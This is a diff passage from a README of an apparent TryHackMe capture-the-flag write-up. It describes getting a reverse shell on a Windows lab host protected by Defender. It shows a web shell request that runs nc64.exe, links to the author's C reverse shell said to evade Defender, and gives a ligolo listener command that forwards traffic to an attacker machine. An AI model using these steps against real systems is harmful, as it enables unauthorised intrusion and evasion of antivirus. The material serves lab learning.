zinzloun/THM_WriteUP/README.md

 So Defender is certainly running.
 To get a stable reverse shell I thought to upload netcat for windows (nc64.exe), but I dont' konw why the command does not work:

     http://10.200.95.31/images/ws.php?c=nc64.exe%20-h
 Returned an empty page.
 Probably defender is blocking the execution.
 Then I tried to use a simple C reverse shell that I coded, since at the moment of writing is not detected by Defender.
 You can get it [here](https://github.com/zinzloun/MalvasiaC).
-Change the server to point to the agent IP, before that we have to configure to activate a listener in ligolo to forward the traffic to our attacker machine.
+Change the server to point to the agent IP, the proceed to upload the file using the form.
+Then we have to configure to activate a listener in ligolo to forward the traffic to our attacker machine.
 In ligolo console issue the following command:

     [Agent : root@ip-10-200-95-33] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp